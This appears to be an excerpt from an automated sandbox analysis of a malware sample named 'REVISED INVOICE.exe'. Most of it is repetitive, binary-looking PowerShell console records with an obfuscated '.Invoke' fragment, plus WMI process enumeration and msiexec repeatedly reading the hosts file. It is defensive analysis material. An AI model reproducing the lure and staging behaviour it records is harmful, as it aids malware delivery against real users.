          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........*.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........+.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........+.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......*+.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................=+.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................I+.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... .......\+.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(.......i+.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................(.......{+.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................0........+.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................|........+.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........+.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........+.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........+.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........+.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......!,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......3,.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......?,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......Q,.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......],.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......o,.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......{,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................4........,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........,.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........,.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........-.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4........-.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......:-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......L-.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......X-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................4.......j-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................4.......v-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ........-.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ........-.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ..................................s....................~.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ..................................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1. .......#..........................s............8....... .......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..................... ......./..........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .$.A.f.t.o.p.p.e.d.e...I.n.v.o.k.e.(.$.M.a.s.k.i.n.g.e.v.r.,. .0.)...........8.......F.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......M....................... .0.)...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~...........8.......F.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......k.......................~.~.~...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......}.......................~.~.~...........................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................~.~.~...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................~.~.~...........................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................~.~.~...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`...............................~.~.~...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`...............................~.~.~...........8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`..................................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4......../.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......*/.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......?/.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......K/.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......]/.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......i/.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......{/.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4......../.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`......../.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......(0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......:0.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......F0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......X0.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......d0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`.......v0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........0.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........0.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......#1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......51.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......A1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`.......T1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......a1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......~1.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........1.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........1.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........2.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`........2.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......!2.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................`.......32.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................`.......?2.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........3.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........3.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."4.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................A4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................M4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................l4.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................y4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4........4.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................4.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................5.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................5.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................h.......*5.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h.......65.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h.......X5.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h.......e5.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4.......y5.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........5.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........5.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........5.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................5.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........5.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........5.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................5.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................5.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................6.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................(6.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................G6.........................s....................j.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................S6.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.4.......f6.........................s............8.......".......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................s6.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........6.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........6.........................s....................`.......................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H........6.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................h........7.........................s............8...............................Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................h........7.........................s............8...............................Jump to behavior
          Source: REVISED INVOICE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeFile read: C:\Users\user\Desktop\REVISED INVOICE.exeJump to behavior
